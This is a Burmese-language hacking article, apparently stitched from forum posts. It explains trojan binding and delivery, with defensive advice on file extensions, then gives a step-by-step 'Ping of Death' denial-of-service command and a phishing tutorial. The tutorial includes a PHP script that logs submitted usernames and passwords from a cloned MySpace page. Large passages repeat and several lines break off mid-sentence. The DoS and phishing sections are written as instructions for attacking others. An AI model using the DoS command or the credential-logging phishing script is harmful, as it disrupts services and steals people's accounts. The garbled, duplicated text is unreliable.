Server file (ဥပမာ အားျဖင့္ netbuserver.exe ဟုကၽႊန္ေတာ္ ဒီမွာ ေခၚဆိုပါမည္) ကို စာဖတ္သူဧ။္ email သို႔ေပးပို႔ျခင္း။ ဒီနည္းဟာ ေရွးအက်ဆံုးနည္းပါ။ ဒါေပမဲ့ ဒါကို သတိမမူလို႔ ေထာင္ခ်က္ထဲက်လာတဲ့ သားေကာင္ေတြ ခုထက္ထိ မနည္းပါဘူး။ ဒီလိုေလး လြယ္လြယ္ေလးလုပ္ႏိုင္ပါသည္။ ဟက္ကာသည္ အထက္ပါ file ကို Game File ဟုဆို၍လည္းေကာင္း၊ ေပ်ာ္စရာ File တစ္ခုဟု ေျပာဆိုကာ ေပးပို႔လိုက္ပါမယ္။ ဒါေပမဲ့ ဘာမွမေပၚလာပါဘူး စာေရးသူ ဖြင့္ၾကည့္ေသာအခါ။ (သံသရ ျဖစ္စရာပါပဲ

စာေရးသူ ဒီလိုမ်ိဳး ကိုယ္မသိတဲ့ File ကိုမသိပဲနဲ႔ Double Click လုပ္ၿပီး ဖြင့္ၾကည့္ၿပီးေတ့ာ ဘာမွမျမင္ရတာ ဘယ္ႏွစ္ႀကိမ္ရွိလဲ စဥ္းစားၾကည့္ပါ။
ဒီအခ်ိန္မွာ ဘာျဖစ္ခဲ့လဲဆိုေတာ့ Server ဆိုတဲ့ File ကို စာဖတ္သူဧ။္ စနစ္ေပၚမွာ သြင္းၿပီးသြားၿပီ ျဖစ္ပါတယ္။ ေနာက္ထပ္ လုပ္စရာလိုတာကေတာ့ Client ဆိုတဲ့ File ကို ဟက္ကာကေန Run လိုက္ၿပီး စာဖတ္သူဧ။္ စနစ္ကို ဆက္သြယ္ရံုပါပဲ။ ဒီအခ်ိန္ကစၿပီး စာဖတ္သူဧ။္ စနစ္ကို စာဖတ္သူဧ။္ ကြန္ပ်ဳတာေရွ႕ွမွာ ထုိင္သံုးကဲ့သို႔ပါပဲ။
ဒီလိုမ်ိဳး လုပ္တာမ်ားလာလုိ႔ လူေတြသတိထားမိလာေသာအခါ အရမ္းကို ညဏ္စူးရွတဲ့ ဟက္ကာေတြက ဒုတိယနည္းလမ္းကို ေျပာင္းသံုးၾကပါတယ္။
နည္းလမ္း ၂
စာဖတ္သူဟာ စာဖတ္သူရဲ့ သူငယ္ခ်င္းဆီက ဆိုၿပီး Flash Games ေတြဘာေတြ ဘယ္ႏွစ္ခါရဘူးပါလဲ။ Saddam ကို ဗံုးႀကဲတာတို႔ Osama Bin Ladin ကို ေသနတ္နဲ႔ပစ္တာတို႔ ဘာတို႔ပါ။ Script ေတြပါတဲ့ Power Point File တို႔ေပါ့။ ဒီလိုမ်ိဳးဟာေတြ ကိုသံုးၿပီး စာဖတ္သူဧ။္ စက္ကိုထိန္းခ်ဳပ္ခြင့္ရရန္ ႀကိဳးစားႏိုင္ပါသည္။
Server ဆိုတဲ့ Trojan ႏွင့္ အမွန္အကန္ File တစ္ခုကို ေပါင္းစပ္ၿပီး Output File တစ္ခုအေနႏွင့္ ျပဳလုပ္ေပးႏိုင္တဲ့ Programs ေတြရွိပါတယ္။ ထုိ Software ေတြက File တစ္ခုအေနႏွင့္ထုတ္ေပးပါတယ္။ ဥပမာအေနနဲ႔ တင္စားရရင္ ေဖ်ာ္ရည္ထဲကို ေဆးခပ္သလိုေပါ့ဗ်ာ။ ဥပမာ Coke ႏွင့္ ေခါင္းခါေဆး ေရာထားတာကို ႀကိဳက္တဲ့အမည္တပ္လို႔ရသလို ေပါ့ ဟက္ကာကလဲ ဒီလိုလုပ္ပါလိမ့္မယ္
Chess.exe + netbuserver.exe = <insert whatever file name you want here.exe> or <chess.exe> အေနႏွင့္ထပ္ေပးလို႔ရပါတယ္။ ဒါက Chess.exe အစစ္ေတာ့မဟုတ္ဘူး ဒါေပမဲ့ Chess.exe ပါပဲ။ ကြဲျပားပံုကို အသိသာဆံုးက File Size နဲ႔ ဆံုးျဖတ္လို႔ရပါတယ္။
The original file: chess.exe size: 50,000 bytes
The new file (with Trojan): chess.exe size: 65,000 bytes
ဒါကို ဟက္ကာ တစ္ေယာက္ဟာ တစ္ေယာက္ေယာက္ဆီပို႔လို႔ရေအာင္ ၁၀ စကၠန္႔အတြင္း လုပ္ယူလို႔ရပါတယ္။ ဒါဆိုရင္ netbuserver.exe ပါေနတဲ့ chess.exe ကို ႏွိပ္လိုက္ရင္ စာဖတ္သူကြန္ပ်ဳတာ ေပၚမွာဖြင့္လုိက္ရင္ ဘာျဖစ္မလဲ။
အေျဖကေတာ့ chess game က ပံုမွန္အတိုင္းပဲ ပြင့္လာပါလိမ့္မယ္။ ဒီအႀကိမ္မွာေတာ့ စာဖတ္သူက သံသယျဖစ္မွာ မဟုတ္ပါဘူး ဘာျဖစ္လို႔လဲဆိုေတာ့ စာဖတ္သူထင္တဲ့အတိုင္း ေပၚလာလို႔ပါ။ ဒါေပမဲ့ စာဖတ္သူ မသိလိုက္တာကေတာ့ chess game ပြင့္လိုက္တဲ့ အခ်ိန္မွာပဲ netbuserver.exe ကိုတစ္ခါတည္း သြင္းၿပီးသားျဖစ္ပါတယ္။
Trojan ျဖင့္ ထိခိုက္ခံရတဲ့ ကြန္ပ်ဳတာဟာ ဒီ အခ်က္အလက္ေတြကို ဟက္ကာဆီျပန္ပို႔ပါလိမ့္မယ္။
Username : ဟက္ကာေတြက စာဖတ္သူကို ေခၚတဲ့ Nickname ပါ။
IP Add : စာဖတ္သူ ကြန္ရက္ကို ဆက္သြယ္ရင္ရတဲ့ လိပ္စာပါ။
Status : စာဖတ္သူ Online လား Offline လား ကို ဟက္ကာကို အသိေပးႏိုင္ပါတယ္။
ဒါေၾကာင့္ Dial Up ပဲျဖစ္ျဖစ္ အေရးမႀကီးပါဘူး။ ကြန္ရက္ႏွင့္ ခ်ိတ္ဆက္မွဳရွိတာနဲ႔ Program က သူ႕ဘာသာသူ အသိေပးမွာပါ။ စာဖတ္သူက ဒါေတြဘယ္လိုျဖစ္ႏိုင္မလဲ ေမးခြန္းရွိပါလိမ့္မယ္။ အေပၚမွာ ေဖၚျပထားတာက ဘယ္လိုထိန္းခ်ဳပ္ႏိုင္လဲထဲက နည္းလမ္းတစ္ခ်ဳိဳ႕ပါ။
ခုဆက္လက္ေရးမွာကေေတာ့ ဟက္ကာေတြက စာဖတ္သူဆီ trojans ေတြဘယ္လိုပို႔ႏိုင္လဲ ဆုိတာပါ။
News Group
ျမန္မာျပည္က လူေတြကေတာ့ အသံုးျပဳတဲ့လူရွားမွာပါ။ Articles ေတြကို Newsgroup မွာတင္ၿပီး Attachment ေတြကို ဖြင့္ၾကည့္ရန္ လိမ္လွည္ထားျခင္း
Forums
ဒါကေတာ့ အထူးတလည္ ရွင္းျပစရာမလိုဘူးထင္ပါတယ္။ ကၽႊန္ေတာ္တို႔ ျမန္မာဆိုင္ဘာမွာေတာ့ ဒါေတြမရွိပါဘူး။ ဒါေပမဲ့ တစ္ခ်ိဳ႕ကၽႊန္ေတာ္သံုးတဲ့တစ္ျခာ
Chat Channels (IRCs) and Instand Messengers (IMs such as GTlak, MSN, Jabbers, and Yahoo)
တစ္ခ်ိဳ႕ Chat Server ေတြမွာ Join တာႏွင့္ File Name.exe၊ File Name.jpg.vbs ဆိုၿပီး File ေတြ မိမိကြန္ပ်ဳတာကို ပို႔ခံႏိုင္ရပါတယ္။ သတိမထားမိတဲ့ အခ်ိန္မွာ ႏွိပ္မိသြားႏိုင္ပါတယ္။ IMs ေတြကေတာ့ ခုခ်ိန္မွာ အမ်ားဆံုးပို႔တဲ့ ေနရာေတြပါ။ ဝမ္းနည္းဖို႔ေကာင္းတာက စစ္တမ္းတစ္ခ်ိဳ႕အရ 80% အသံုးျပဳသူေတြဟာ သတိမထားမိပါဘူး။ ဥပမာ အေနႏွင့္ thayetmyo ဆိုၿပီးလား Gtalk ကေန ျပန္႔တဲ့ Vrius လား၊ Worm လား၊ မသိေခတ္စားလိုက္ပါေသးတယ္။ ကၽႊန္ေတာ္ကေတာ့ တစ္ခါမွ မခံရေတာ့ ဘာအမ်ိဳးအစားလဲ မသိလိုက္ပါဘူး။
ဒါကေတာ့ ကၽႊန္ေတာ္ အထူးတလည္ မေျပာေတာ့ပါဘူး။
Unsafe Web Sites
တစ္ခ်ိဳ႕ Official မဟုတ္တဲ့ site ေတြမွာ အမ်ားဆံုးေတြ႕ရပါတယ္။ အဲလိုမ်ိဳး Site ကေန Download လုပ္လိုက္တဲ့ file ေတြကို ဂရုထားသင့္ပါတယ္။
[HIGHLIGHT=#000000]စကားခ်ပ္ - မပူပါနဲ႔ ဒီမွာ Cracked Software ေတြ ဒိုင္ခံတင္ေပးတဲ့ ကိုဖက္ဆီ၊ ကိုေကာင္း၊ ကိုေကာင္ေလး ႏွင့္ ဘဘဗိုင္းရပ္စ္တို႔ အရင္ခံရမွာပါ။ [/HIGHLIGHT][HIGHLIGHT=#
ျမင္တဲ့အတုိင္း ဒါကျဖန္႔ေဝလို႔ရတဲ့ နည္းေတြထဲက တစ္ခ်ိဳ႕ပါ။ အဲ ေနာက္ဆံုး ကၽႊန္ေတာ္စဥ္းစားမိတာကေတာ့ Social Networking Sites ေတြကပါ။ ဥပမာ Friendster, Facebook, and My Space လိုမ်ိဳးေတြကပါ။ ဟုိတစ္ေလာတုန္းကေတာင္ ေဘာ္ေဘာ္တစ္ေယာက္ရဲ့ ေကာင္မေလးစက္ Friendster ကေန တစ္ဆင့္ Injected လုပ္ခံရတာကို မွတ္မွတ္ရရ Clean ေပးလုိက္ရပါေသးတယ္။
ဒီ ဒုတိယ အခန္းကို ဖတ္ၿပီးေတာ့ စာဖတ္သူအရင္ကထက္ ကြန္ရက္ေပၚက အလားအလာရွိတဲ့ အႏၱရာယ္ေတြကို ပိုၿပီးသတိထားမိလာမယ္လို႔ ေမ်ာ္လင့္ပါတယ္။ ေနာက္တစ္ခန္းမွာေတာ့ ဘယ္လို file အမ်ိဳးအစားေတြကို လက္ခံႏုိင္လဲရင္ အႏၱရာယ္နည္းလဲကို ေျပာျပပါသြားမယ္။
အခန္း ၃ - လက္ခံလွ်င္ အႏၱရာယ္နည္းေသာဖိုင္မ်ား
အရင္ အခန္းကိုဖတ္ၿပီး ဘယ္လို ဖိုင္လ္အမ်ိဳးအစားေတြကို လက္ခံလို႔ရမလဲ အေမးရွိေနပါၾကမယ္။ အကုန္လုံးမေျဖဆိုႏိုင္ေပမဲ့ တတ္ႏိုင္သမွ် ႀကိဳးစားၿပီး ဘယ္ဖိုင္လ္အမ်ိဳးအစားေတြက အႏၱရာယ္နည္းလဲ ေျပာျပပါ့မယ္။
ပံုမွန္ဖိုင္လ္အမ်ိဳးအစားမ်ားနဲ ႔ ဘယ္လိုဖိုင္လ္အမ်ိဳးအစားေတြက .exe (Executable) အမ်ိဳးအစားေတြနဲ႔ မလာသင့္ဘူးဆိုတာ ယွဥ္ျပသြားပါမယ္။
ဓါတ္ပံုမ်ား
Email ေတြသံုးေနၾက Online မွာ Chat ေနၾကတဲ့ ခင္တဲ့သူအခ်င္းခ်င္း ဓါတ္ပံုေလးေတြ IRC Channels ေတြကပဲျဖစ္ျဖစ္၊ IMs ေတြကပဲျဖစ္ျဖစ္၊ Email ကပဲျဖစ္ျဖစ္ ပို႔ၾကမွာပါပဲ။ အကယ္၍ ဓါတ္ပံုေလးေတြရရွိခဲ့ရင္ ဒီ Format (mypic
_x.exe) နဲ႔ မဟုတ္ရင္ ေကာင္းပါတယ္။ ဟုတ္ရင္ေတာ့ ထိုလိုမ်ိဳး .exe နဲ႔ဆံုးေသာဖိုင္လ္ကို မဖြင့္ခင္ Virus Scanner နဲ႔ အရင္စစ္သင့္ပါတယ္။
ပံုေတြဆိုရင္ ဒီလိုမ်ိဳး Extensions မ်ိဳးေတြနဲ႔အမ်ားဆံုးလာပါတယ္။
1. Bmp (Bitmap (For Example: demohunter.bmp))
2. Jpg (JPEG (For Example: demohunter.jpg))
3. TIFF (Tag Image File Format (For Example : demohunter.tiff))
4. Gif (Graphics Interchange Format (For Example : demohunter.gif))
ဒါေတြက တရားဝင္ Image Extensions မ်ားျဖစ္ပါတယ္။ ဓါတ္ပံုဆိုပါက အထက္ပါ Extension ထဲက အခ်ိဳ႕ႏွင့္ပဲ လာသင့္ပါတယ္။ အဲလိုမွမဟုတ္ဘဲ .exe ႏွင့္အဆံုးသတ္ေသာ ဓါတ္ပံုဟုေျပာပါက သတိထားၿပီး Virus Scanner
ႏွင့္စစ္သင့္ပါတယ္။ ကိုယ္မသိေသာ Extension ျဖစ္ပါက Extension ကိုမွတ္ၿပီး Google တြင္ ရွာေဖြႏိုင္ပါသည္။
Text Files
အင္တာနက္ေပၚမွာရွိတဲ့ Information Documents အကုန္လံုး ဒီထဲက ေဖာ္ျပထားတဲ့ အမ်ိဳးအစားမ်ားနဲ႔ လာၾကပါတယ္။ Text File ဆိုသည္မွာ Word Processor Software (သို႔) Text Editor ထဲမွာ စာစီထားေသာ သတင္းအခ်က္အလက္
မွတ္တမ္းမ်ားျဖစ္ပါသည္။
၁. Doc and DocX (Microsoft မွ အသံုးျပဳေသာ Document Format ျဖစ္ပါသည္။ ဥပမာ ဒီမိုဟန္တာ.doc)
၂. TXT (အရိုးရွင္းဆံုး Document အမ်ိဳးအစားျဖစ္ပါသည္။ Notepad ႏွင့္ သိမ္းပါက ရေသာ အမ်ိဳးအစားျဖစ္ပါသည္။)
၃. PPT (Microsoft Powerpoint ဧ။္ အမ်ိဳးအစားျဖစ္ပါသည္။)
၄. RTF (Rich Text Format သည္ Word Pad ႏွင့္ သိမ္းပါက ရပါသည္။ အေျခခံ စာစီစာရိုက္ ေကာင္းေကာင္းလုပ္ႏိုင္ပါသည္။)
အထက္ပါ ေဖာ္ျပပါ အမ်ိဳးအစားသည္ စိတ္ခ်ရေသာ Text File အမ်ိဳးအစားမ်ားျဖစ္ပါသည္။ ဒါေပမဲ့ အရိုးသားဆံုး ဝန္ခံရပါက Text File သည္ပံုစံမ်ိဳးစံုႏွင့္လာႏိုင္ပါ သည္။ ဒါေပမဲ့ Text File ဆိုပါက ဒီလုိ Extension မ်ိဳးႏွင့္မလာသင့္ပါ။
ဥပမာအားျဖင့္
၁. <demohunter>.com
၂. <demohunter>.exe
၃. <demohunter>.doc.vbs တို႔လိုမ်ိဳးျဖစ္ပါသည္။
တစ္ေယာက္က Document File ဟုေျပာပါက အထက္ပါ ပံုမ်ိဳးကဲ့သို႔ မလာသင့္ပါ။ ထုိ႔အျပင္ ေနာက္ဆံုးဥပမာမွာ ျပထားသကဲ့သို႔ ဘယ္ဖုိင္လ္မ်ိဳးမွ Extension ႏွစ္ခုႏွင့္မလာသင့္ပါ။ ထို႔သို File မ်ိဳးေတြ႕ပါက virus scanner ႏွင့္စစ္ျခင္း၊ ဖြင့္မၾကည့္ျခင္း တို႔လုပ္သင့္ပါတယ္။ မိမိသည္ ဘယ္လိုဖုိင္အမ်ိဳးအစားလဲ မသိပါက လံုးဝမဖြင့္သင့္ပါ။ ဖြင့္ဖတ္ရမည္ဆိုပါက Google တြင္ဘယ္လိုဖိုင္လ္ အမ်ိဳးအစားလဲဆိုတာ အရင္ရွာေဖြသင့္ပါတယ္။
ၿပီးခဲ့ေသာ အခန္းမ်ားတြင္ မိမိကြန္ပ်ဳတာဧ။္ လံုၿခံဳေရးအားနည္းခ်က္ကို အခြင့္ေကာင္းယူ၍ ဝင္ေရာက္ႏိုင္ပံု၊ သာမန္ဖိုင္လ္ေတြကို အႏၱရာယ္ရွိေသာဖိုင္လ္မ်ားႏွင့္ ေပါင္းစပ္ႏိုင္ပံု၊ ထိုေရာဂါပိုးဖုိင္လ္မ်ားကို စာဖတ္သူဆီေရာက္ေအာင္ ဘယ္လိုလိမ္လွည္ပို႔ႏိုင္ပံု တို႔ကို ရွင္းျပၿပီးသြားပါၿပီ။ အခန္း ၄ တြင္ေတာ့ ထိုလိုမ်ိဳးတိုက္ခိုက္မွဳေတြကို လုပ္ေသာလူေတြအေၾကာင္းကို ေရးသားသြားပါမယ္။
အရင္ အခန္းကိုဖတ္ၿပီး ဘယ္လို ဖိုင္လ္အမ်ိဳးအစားေတြကို လက္ခံလို႔ရမလဲ အေမးရွိေနပါၾကမယ္။ အကုန္လုံးမေျဖဆိုႏိုင္ေပမဲ့ တတ္ႏိုင္သမွ် ႀကိဳးစားၿပီး ဘယ္ဖိုင္လ္အမ်ိဳးအစားေတြက အႏၱရာယ္နည္းလဲ ေျပာျပပါ့မယ္။
ပံုမွန္ဖိုင္လ္အမ်ိဳးအစားမ်ားနဲ
ဓါတ္ပံုမ်ား
Email ေတြသံုးေနၾက Online မွာ Chat ေနၾကတဲ့ ခင္တဲ့သူအခ်င္းခ်င္း ဓါတ္ပံုေလးေတြ IRC Channels ေတြကပဲျဖစ္ျဖစ္၊ IMs ေတြကပဲျဖစ္ျဖစ္၊ Email ကပဲျဖစ္ျဖစ္ ပို႔ၾကမွာပါပဲ။ အကယ္၍ ဓါတ္ပံုေလးေတြရရွိခဲ့ရင္ ဒီ Format (mypic
_x.exe) နဲ႔ မဟုတ္ရင္ ေကာင္းပါတယ္။ ဟုတ္ရင္ေတာ့ ထိုလိုမ်ိဳး .exe နဲ႔ဆံုးေသာဖိုင္လ္ကို မဖြင့္ခင္ Virus Scanner နဲ႔ အရင္စစ္သင့္ပါတယ္။
ပံုေတြဆိုရင္ ဒီလိုမ်ိဳး Extensions မ်ိဳးေတြနဲ႔အမ်ားဆံုးလာပါတယ္။
1. Bmp (Bitmap (For Example: demohunter.bmp))
2. Jpg (JPEG (For Example: demohunter.jpg))
3. TIFF (Tag Image File Format (For Example : demohunter.tiff))
4. Gif (Graphics Interchange Format (For Example : demohunter.gif))
ဒါေတြက တရားဝင္ Image Extensions မ်ားျဖစ္ပါတယ္။ ဓါတ္ပံုဆိုပါက အထက္ပါ Extension ထဲက အခ်ိဳ႕ႏွင့္ပဲ လာသင့္ပါတယ္။ အဲလိုမွမဟုတ္ဘဲ .exe ႏွင့္အဆံုးသတ္ေသာ ဓါတ္ပံုဟုေျပာပါက သတိထားၿပီး Virus Scanner
ႏွင့္စစ္သင့္ပါတယ္။ ကိုယ္မသိေသာ Extension ျဖစ္ပါက Extension ကိုမွတ္ၿပီး Google တြင္ ရွာေဖြႏိုင္ပါသည္။
Text Files
အင္တာနက္ေပၚမွာရွိတဲ့ Information Documents အကုန္လံုး ဒီထဲက ေဖာ္ျပထားတဲ့ အမ်ိဳးအစားမ်ားနဲ႔ လာၾကပါတယ္။ Text File ဆိုသည္မွာ Word Processor Software (သို႔) Text Editor ထဲမွာ စာစီထားေသာ သတင္းအခ်က္အလက္
မွတ္တမ္းမ်ားျဖစ္ပါသည္။
၁. Doc and DocX (Microsoft မွ အသံုးျပဳေသာ Document Format ျဖစ္ပါသည္။ ဥပမာ ဒီမိုဟန္တာ.doc)
၂. TXT (အရိုးရွင္းဆံုး Document အမ်ိဳးအစားျဖစ္ပါသည္။ Notepad ႏွင့္ သိမ္းပါက ရေသာ အမ်ိဳးအစားျဖစ္ပါသည္။)
၃. PPT (Microsoft Powerpoint ဧ။္ အမ်ိဳးအစားျဖစ္ပါသည္။)
၄. RTF (Rich Text Format သည္ Word Pad ႏွင့္ သိမ္းပါက ရပါသည္။ အေျခခံ စာစီစာရိုက္ ေကာင္းေကာင္းလုပ္ႏိုင္ပါသည္။)
အထက္ပါ ေဖာ္ျပပါ အမ်ိဳးအစားသည္ စိတ္ခ်ရေသာ Text File အမ်ိဳးအစားမ်ားျဖစ္ပါသည္။ ဒါေပမဲ့ အရိုးသားဆံုး ဝန္ခံရပါက Text File သည္ပံုစံမ်ိဳးစံုႏွင့္လာႏိုင္ပါ
ဥပမာအားျဖင့္
၁. <demohunter>.com
၂. <demohunter>.exe
၃. <demohunter>.doc.vbs တို႔လိုမ်ိဳးျဖစ္ပါသည္။
တစ္ေယာက္က Document File ဟုေျပာပါက အထက္ပါ ပံုမ်ိဳးကဲ့သို႔ မလာသင့္ပါ။ ထုိ႔အျပင္ ေနာက္ဆံုးဥပမာမွာ ျပထားသကဲ့သို႔ ဘယ္ဖုိင္လ္မ်ိဳးမွ Extension ႏွစ္ခုႏွင့္မလာသင့္ပါ။ ထို႔သို File မ်ိဳးေတြ႕ပါက virus scanner ႏွင့္စစ္ျခင္း၊ ဖြင့္မၾကည့္ျခင္း တို႔လုပ္သင့္ပါတယ္။ မိမိသည္ ဘယ္လိုဖုိင္အမ်ိဳးအစားလဲ မသိပါက လံုးဝမဖြင့္သင့္ပါ။ ဖြင့္ဖတ္ရမည္ဆိုပါက Google တြင္ဘယ္လိုဖိုင္လ္ အမ်ိဳးအစားလဲဆိုတာ အရင္ရွာေဖြသင့္ပါတယ္။
ၿပီးခဲ့ေသာ အခန္းမ်ားတြင္ မိမိကြန္ပ်ဳတာဧ။္ လံုၿခံဳေရးအားနည္းခ်က္ကို အခြင့္ေကာင္းယူ၍ ဝင္ေရာက္ႏိုင္ပံု၊ သာမန္ဖိုင္လ္ေတြကို အႏၱရာယ္ရွိေသာဖိုင္လ္မ်ားႏွင့္ ေပါင္းစပ္ႏိုင္ပံု၊ ထိုေရာဂါပိုးဖုိင္လ္မ်ားကို စာဖတ္သူဆီေရာက္ေအာင္ ဘယ္လိုလိမ္လွည္ပို႔ႏိုင္ပံု တို႔ကို ရွင္းျပၿပီးသြားပါၿပီ။ အခန္း ၄ တြင္ေတာ့ ထိုလိုမ်ိဳးတိုက္ခိုက္မွဳေတြကို လုပ္ေသာလူေတြအေၾကာင္းကို ေရးသားသြားပါမယ္။
ကြ်န္ေတာ္သိသေလာက္ေလ သိေစခ်င္လုိ ့
- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္
ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျ ဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္
ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျ ခင္းတို႕ကိုဆိုလိုပါတယ္…
- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္ မ်ားကေတာ့
၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္
၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address
- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။
- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္
လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address
ကိုရိုက္ထည္႕ရပါမည္။
-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္ သည္။ အႀကိမ္အေရအတြက္
ကိုေျပာင္းလဲႏိုင္ပါတယ္
-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္ ေလာက္ၾကာရင္ေနာက္တစ္ခါထပ္တိုက္ ခိုက္
မွာလည္းကိုေျပာျခင္းပါတယ္
သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခို က္ႏိုင္မွာမဟုတ္ပါဘူး။
- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္
- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္
ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျ
ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျ
- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္
၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္
၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address
- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။
- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္
လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address
ကိုရိုက္ထည္႕ရပါမည္။
-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္
ကိုေျပာင္းလဲႏိုင္ပါတယ္
-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္
မွာလည္းကိုေျပာျခင္းပါတယ္
သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခို
- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္
အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။ တစ္စုံတစ္ဦးကိုနစ္နာလိုေသာရည္ ပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္ Phishing ဆိုတာဘာလည္း ? Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး |
Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထား
ဘာလို႕ဖန္တီးတာလည္း ?
ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password ေတြပါသြားၿပီေပါ့
ဘယ္လိုဖန္တီးမွာလည္း ?
ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ
MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http
Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ
အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္
Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ
Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္ websiteကိုလမ္းေၾကာင္းေျပာင္းသြ
Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ
Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ
www.tizag.com, www.w3schools.
<?php
header (’Location: http://myspace.com
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါ
ေနာက္ upload လုပ္ပါ
Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္
action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက user name နဲ႕ password
ေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္
index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။
action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿ
အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿ
Netsh.execommand-line scripting utility ဟာ locally (သို႕) remotely,ယခုလက္ရိွအသုံးျပဳေနတဲ
